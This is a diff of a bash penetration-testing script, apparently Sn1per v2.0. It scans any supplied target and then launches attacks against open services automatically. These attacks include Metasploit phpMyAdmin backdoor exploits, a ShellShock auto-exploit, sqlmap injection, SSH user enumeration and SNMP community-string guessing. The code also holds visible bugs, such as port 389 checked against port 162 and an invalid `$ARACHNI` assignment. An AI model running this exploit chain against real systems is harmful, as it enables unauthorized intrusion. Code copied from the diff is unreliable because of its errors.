+			python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $a -vvv -o $LOOT_DIR/domains/domains-$a.txt 2>/dev/null
+			dos2unix $LOOT_DIR/domains/domains-$a.txt 2>/dev/null
 			echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
-			for b in `cat loot/domains/domains-$a.txt`; do dig $b CNAME | egrep -i 'heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot' 2>/dev/null; done;
+			for b in `cat $LOOT_DIR/domains/domains-$a.txt 2> /dev/null`; do dig $b CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot' 2>/dev/null; done;
 			echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
-			python SimpleEmailSpoofer/spoofcheck.py $a 2>/dev/null
+			python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $a 2>/dev/null
 		fi
 		echo ""
-		echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
-		nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152 $a -oX $LOOT_DIR/nmap-$a.xml
-		echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
-		nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $a
-		echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
-		wafw00f http://$a
-		wafw00f https://$a
-		echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
-		whatweb http://$a
-		whatweb https://$a
-		xsstracer $a 80
-		xsstracer $a 443
-		echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET"
-		sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $a
-		sslscan --no-failed $a
-		testssl $a
-		echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
-		cutycapt --url=http://$a --out=loot/$a-port80.jpg
-		echo -e "$OKRED[+]$RESET Screenshot saved to $PWD/loot/$a-port80.jpg"
-		cutycapt --url=https://$a --out=loot/$a-port443.jpg
-		echo -e "$OKRED[+]$RESET Screenshot saved to $PWD/loot/$a-port443.jpg"
+		echo -e "$OKGREEN + -- ----------------------------=[Running port scan]=------------------- -- +$RESET"
+		nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $a -oX $LOOT_DIR/nmap/nmap-$a.xml
+		
+		port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$a.xml | grep open`
+		port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$a.xml | grep open`
+		
+		if [ -z "$port_80" ];
+		then
+			echo -e "$OKRED + -- --=[Port 80 closed... skipping.$RESET"
+		else
+			echo -e "$OKORANGE + -- --=[Port 80 opened... running tests...$RESET"
+			echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
+			wafw00f http://$a 
+			echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
+			whatweb http://$a
+			echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET"
+			xsstracer $a 80
+			echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
+			cutycapt --url=http://$a --out=$LOOT_DIR/screenshots/$a-port80.jpg
+		fi
+		
+		if [ -z "$port_443" ];
+		then
+			echo -e "$OKRED + -- --=[Port 443 closed... skipping.$RESET"
+		else
+			echo -e "$OKORANGE + -- --=[Port 443 opened... running tests...$RESET"
+			echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
+			wafw00f https://$a 
+			echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
+			whatweb https://$a
+			echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET"
+			xsstracer $a 443
+			echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET"
+			sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $a
+			sslscan --no-failed $a
+			echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
+			cutycapt --url=https://$a --out=$LOOT_DIR/screenshots/$a-port443.jpg
+			echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$a-port443.jpg"
+		fi
+		
 		echo -e "$OKGREEN + -- ----------------------------=[Done!]=----------------------------------- -- +$RESET"
-		cd $PWD/loot/
-		echo -e "$OKORANGE + -- --=[Sorting loot directory ($PWD)"
-		mkdir reports/ -p 2> /dev/null
-		echo -e "$OKORANGE + -- --=[Generating reports..."
-		for a in `ls sniper-*.txt 2>/dev/null`; do echo "$a" >> reports/$a && sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a > reports/$a; done
-		mv $PWD/report-* $PWD/reports/ 2> /dev/null
-		mkdir $PWD/screenshots/ -p 2> /dev/null
-		mv $PWD/*.jpg $PWD/screenshots/ 2> /dev/null
-		mkdir $PWD/nmap -p 2> /dev/null
-		mv $PWD/*.xml $PWD/nmap/ 2> /dev/null
-		mkdir $PWD/domains -p 2> /dev/null
-		mv $PWD/domains-* $PWD/domains/ 2> /dev/null
-		mkdir $PWD/output -p 2> /dev/null
-		mv $PWD/sniper-* $PWD/output 2> /dev/null
-		rm -f $PWD/.fuse_* 2> /dev/null
 		echo -e ""
 		echo -e ""
 		echo -e ""
@@ -423,7 +477,7 @@ fi
 
 if [ "$MODE" = "nuke" ]; then
 	if [ "$OPT1" = "report" ]; then
-		./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
+		sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
 		exit
 	fi
 	for a in `cat $TARGET`; do
@@ -442,7 +496,7 @@ if [ "$MODE" = "nuke" ]; then
 		echo -e "$OKRED                        (\` ^''\`-' ')"
 		echo -e "$OKRED --------------------------------------------------------- $RESET"
 		echo -e "$OKORANGE + -- --=[WARNING! Nuking ALL target! $RESET"
-		./sniper $a
+		sniper $a
 		echo -e ""
 		echo -e ""
 		echo -e ""
@@ -470,7 +524,7 @@ echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
 echo -e "$OKRED               /_/                 $RESET"
 echo -e "$RESET"
 echo -e "$OKORANGE + -- --=[http://crowdshield.com"
-echo -e "$OKORANGE + -- --=[sn1per v1.9 by 1N3"
+echo -e "$OKORANGE + -- --=[sn1per v2.0 by 1N3"
 echo -e "$RESET"
 echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET"
 nslookup $TARGET
@@ -486,14 +540,14 @@ then
 	echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET"
 	dig -x $TARGET
 	dnsenum $TARGET
-	mv -f *_ips.txt loot/ 2>/dev/null
+	mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
 	echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET"
-	python Sublist3r/sublist3r.py -d $TARGET -vvv -o loot/domains/domains-$TARGET.txt 2>/dev/null
-	dos2unix loot/domains/domains-$TARGET.txt 2>/dev/null
+	python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
+	dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
 	echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
-	for a in `cat loot/domains/domains-$TARGET.txt`; do dig $a CNAME | egrep -i 'heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot' 2>/dev/null; done;
+	for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot' 2>/dev/null; done;
 	echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
-	python SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null
+	python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null
 fi
 echo ""
 echo -e "$OKGREEN + -- ----------------------------=[Pinging host]=---------------------------- -- +$RESET"
@@ -501,13 +555,13 @@ ping -c 1 $TARGET
 echo ""
 echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
 if [ -z "$OPT1" ]; then
-	nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152 $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml
+	nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
 	echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
 	nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
 elif [ "$OPT1" == "web" ]; then
-	nmap -sV -T5 -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml
+	nmap -sV -T5 -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
 else
-	nmap -sS -T5 -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml
+	nmap -sS -T5 -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
 	echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
 	nmap -sU -T5 -p U:$OPT1 --open $TARGET
 fi
@@ -516,47 +570,48 @@ service postgresql start
 
 echo ""
 echo -e "$OKGREEN + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +$RESET"
-port_21=`grep 'portid="21"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_22=`grep 'portid="22"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_23=`grep 'portid="23"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_25=`grep 'portid="25"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_53=`grep 'portid="53"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_79=`grep 'portid="79"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_80=`grep 'portid="80"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_110=`grep 'portid="110"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_111=`grep 'portid="111"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_135=`grep 'portid="135"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_139=`grep 'portid="139"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_161=`grep 'portid="161"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_162=`grep 'portid="162"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_389=`grep 'portid="162"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_443=`grep 'portid="443"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_445=`grep 'portid="445"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_512=`grep 'portid="512"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_513=`grep 'portid="513"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_514=`grep 'portid="514"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_1099=`grep 'portid="1099"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_1433=`grep 'portid="1099"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_1524=`grep 'portid="1524"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_2049=`grep 'portid="2049"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_2121=`grep 'portid="2121"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_3128=`grep 'portid="3128"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_3306=`grep 'portid="3306"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_3310=`grep 'portid="3310"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_3389=`grep 'portid="3389"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_3632=`grep 'portid="3632"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_5432=`grep 'portid="5432"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_5800=`grep 'portid="5800"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_5900=`grep 'portid="5900"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_6667=`grep 'portid="6667"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_8000=`grep 'portid="8000"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_8009=`grep 'portid="8009"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_8080=`grep 'portid="8080"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_8180=`grep 'portid="8180"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_8443=`grep 'portid="8443"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_8888=`grep 'portid="8888"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_10000=`grep 'portid="10000"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
-port_49152=`grep 'portid="49152"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
+port_21=`grep 'portid="21"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_22=`grep 'portid="22"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_23=`grep 'portid="23"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_25=`grep 'portid="25"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_53=`grep 'portid="53"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_79=`grep 'portid="79"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_110=`grep 'portid="110"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_111=`grep 'portid="111"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_135=`grep 'portid="135"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_139=`grep 'portid="139"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_161=`grep 'portid="161"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_162=`grep 'portid="162"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_389=`grep 'portid="162"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_445=`grep 'portid="445"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_512=`grep 'portid="512"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_513=`grep 'portid="513"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_514=`grep 'portid="514"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_1099=`grep 'portid="1099"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_1433=`grep 'portid="1433"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_1524=`grep 'portid="1524"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_2049=`grep 'portid="2049"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_2121=`grep 'portid="2121"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_3128=`grep 'portid="3128"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_3306=`grep 'portid="3306"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_3310=`grep 'portid="3310"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_3389=`grep 'portid="3389"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_3632=`grep 'portid="3632"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_4443=`grep 'portid="4443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_5432=`grep 'portid="5432"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_5800=`grep 'portid="5800"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_5900=`grep 'portid="5900"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_6667=`grep 'portid="6667"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_8000=`grep 'portid="8000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_8009=`grep 'portid="8009"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_8080=`grep 'portid="8080"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_8180=`grep 'portid="8180"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_8443=`grep 'portid="8443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_8888=`grep 'portid="8888"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_10000=`grep 'portid="10000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_49152=`grep 'portid="49152"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 
 if [ -z "$port_21" ];
 then
@@ -572,11 +627,11 @@ then
 	echo -e "$OKRED + -- --=[Port 22 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 22 opened... running tests...$RESET"
-	cd ssh-audit
+	cd $PLUGINS_DIR/ssh-audit
 	python ssh-audit.py $TARGET:22
-	cd ..
+	cd $INSTALL_DIR
 	nmap -A -sV -sC -T5 -p 22 --script=ssh-* $TARGET
-	msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$PWD"/BruteX/wordlists/simple-users.txt; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
+	msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$USER_FILE"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
 fi
 
 if [ -z "$port_23" ];
@@ -614,7 +669,7 @@ then
 else
 	echo -e "$OKORANGE + -- --=[Port 79 opened... running tests...$RESET"
 	nmap -A -sV -T5 --script=finger* -p 79 $TARGET
-	bin/fingertool.sh $TARGET BruteX/wordlists/simple-users.txt
+	bin/fingertool.sh $TARGET $USER_FILE
 fi
 
 if [ -z "$port_80" ];
@@ -645,6 +700,9 @@ else
 	echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE"
 	curl -s --insecure -I -X TRACE http://$TARGET | grep TRACE | tail -n 10
 	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking for META tags on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure http://$TARGET | egrep -i meta --color=auto | tail -n 10
+	echo ""
 	echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE"
 	curl -s --insecure -x http://$TARGET:80 -L http://crowdshield.com/.testing/openproxy.txt | tail -n 10
 	echo ""
@@ -680,8 +738,8 @@ else
 	echo -e "$OKGREEN + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +$RESET"
 	nikto -h http://$TARGET 
 	echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
-	echo -e "$OKRED[+]$RESET Screenshot saved to $PWD/loot/$TARGET-port80.jpg"
-	cutycapt --url=http://$TARGET --out=loot/$TARGET-port80.jpg
+	echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port80.jpg"
+	cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg
 	
 	if [ "$MODE" = "web" ];
 	then
@@ -700,14 +758,22 @@ else
 		echo ""
 		python $CMSMAP -t http://$TARGET/wordpress/
 		echo ""
-		echo -e "$OKGREEN + -- ----------------------------=[Running Uniscan Web Vulnerability Scan]=-- -- +$RESET"
-		uniscan -u http://$TARGET -qweds
+		#echo -e "$OKGREEN + -- ----------------------------=[Running Uniscan Web Vulnerability Scan]=-- -- +$RESET"
+		#uniscan -u http://$TARGET -qweds
+		echo -e "$OKGREEN + -- ----------------------------=[Running Arachni Web Application Scan]=---- -- +$RESET"
+		mkdir -p $INSTALL_DIR/loot/web/$TARGET/ 2> /dev/null
+		arachni --report-save-path=$INSTALL_DIR/loot/web/$TARGET/ --output-only-positives http://$TARGET
+		cd $INSTALL_DIR/loot/web/$TARGET/
+		arachni_reporter $INSTALL_DIR/loot/web/$TARGET/*.afr --report=html:outfile=$INSTALL_DIR/loot/web/$TARGET/arachni.zip
+		unzip $INSTALL_DIR/loot/web/$TARGET/arachni.zip
+		$ARACHNI="1"
+		cd $INSTALL_DIR
 		echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET"
 		sqlmap -u "http://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a
 		echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET"
 		msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
 		echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET"
-		python shocker/shocker.py -H $TARGET --cgilist shocker/shocker-cgi_list --port 80
+		python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80
 	fi
 	
 	if [ $SCAN_TYPE == "DOMAIN" ];
@@ -715,7 +781,7 @@ else
 		echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------- -- +$RESET"
 		goohak $TARGET > /dev/null
 		echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +$RESET"
-		php $INURLBR --dork "site:$TARGET" -s $LOOT_DIR/inurlbr-$TARGET.txt
+		php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
 		rm -Rf output/ cookie.txt exploits.conf
 		GHDB="1"
 	fi
@@ -767,7 +833,7 @@ then
 	echo -e "$OKRED + -- --=[Port 161 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 161 opened... running tests...$RESET"
-	for a in `cat BruteX/wordlists/snmp-strings.txt`; do snmpwalk $TARGET -c $a; done;
+	for a in `cat /usr/share/brutex/wordlists/snmp-strings.txt`; do snmpwalk $TARGET -c $a; done;
 	nmap -sU -p 161 --script=snmp* $TARGET
 fi
 
@@ -776,7 +842,7 @@ then
 	echo -e "$OKRED + -- --=[Port 162 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 162 opened... running tests...$RESET"
-	for a in `cat BruteX/wordlists/snmp-strings.txt`; do snmpwalk $TARGET -c $a; done;
+	for a in `cat /usr/share/brutex/wordlists/snmp-strings.txt`; do snmpwalk $TARGET -c $a; done;
 	nmap -A -p 162 --script=snmp* $TARGET
 fi
 
@@ -804,9 +870,9 @@ else
 	sslscan --no-failed $TARGET 
 	testssl $TARGET
 	echo ""
-	cd MassBleed
+	cd $PLUGINS_DIR/MassBleed
 	./massbleed $TARGET port 443
-	cd ..
+	cd $INSTALL_DIR
 	echo -e "$OKGREEN + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +$RESET"
 	echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE"
 	curl -s --insecure -I https://$TARGET | egrep -i 'X-Content' | tail -n 10
@@ -823,6 +889,9 @@ else
 	echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE"
 	curl -s --insecure -I -X TRACE https://$TARGET | grep TRACE
 	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking for META tags on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure https://$TARGET | egrep -i meta --color=auto | tail -n 10
+	echo ""
 	echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE"
 	curl -x https://$TARGET:443 -L https://crowdshield.com/.testing/openproxy.txt -s --insecure | tail -n 10
 	echo ""
@@ -858,8 +927,8 @@ else
 	echo -e "$OKGREEN + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +$RESET"
 	nikto -h https://$TARGET 
 	echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
-	cutycapt --url=https://$TARGET --out=loot/$TARGET-port443.jpg
-	echo -e "$OKRED[+]$RESET Screenshot saved to $PWD/loot/$TARGET-port443.jpg"
+	cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg
+	echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port443.jpg"
 	
 	if [ "$MODE" = "web" ];
 	then
@@ -876,14 +945,26 @@ else
 		echo ""
 		python $CMSMAP -t https://$TARGET/wordpress/
 		echo ""
-		echo -e "$OKGREEN + -- ----------------------------=[Running Uniscan Web Vulnerability Scan]=-- -- +$RESET"
-		uniscan -u https://$TARGET -qweds
+		#echo -e "$OKGREEN + -- ----------------------------=[Running Uniscan Web Vulnerability Scan]=-- -- +$RESET"
+		#uniscan -u https://$TARGET -qweds
+		if [ $ARACHNI == "1" ];
+		then
+			echo -e "$OKGREEN + -- ----------------------------=[Skipping Arachni Scan]=------------------- -- +$RESET"
+		else
+			echo -e "$OKGREEN + -- ----------------------------=[Running Arachni Web Application Scan]=---- -- +$RESET"
+			mkdir -p $INSTALL_DIR/loot/web/$TARGET/ 2> /dev/null
+			arachni --report-save-path=$INSTALL_DIR/loot/web/$TARGET/ --output-only-positives https://$TARGET
+			cd $INSTALL_DIR/loot/web/$TARGET/
+			arachni_reporter $INSTALL_DIR/loot/web/$TARGET/*.afr --report=html:outfile=$INSTALL_DIR/loot/web/$TARGET/arachni.zip
+			unzip $INSTALL_DIR/loot/web/$TARGET/arachni.zip
+			cd $INSTALL_DIR
+		fi
 		echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET"
 		sqlmap -u "https://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a
 		echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET"
 		msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
 		echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET"
-		python shocker/shocker.py -H $TARGET --cgilist shocker/shocker-cgi_list --port 443 --ssl
+		python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 443 --ssl
 	fi
 	
 	if [ $SCAN_TYPE == "DOMAIN" ];
@@ -893,7 +974,7 @@ else
 			echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=---------- -- +$RESET"
 			goohak $TARGET > /dev/null
 			echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=----------- -- +$RESET"
-			php $INURLBR --dork "site:$TARGET" -s $LOOT_DIR/inurlbr-$TARGET.txt
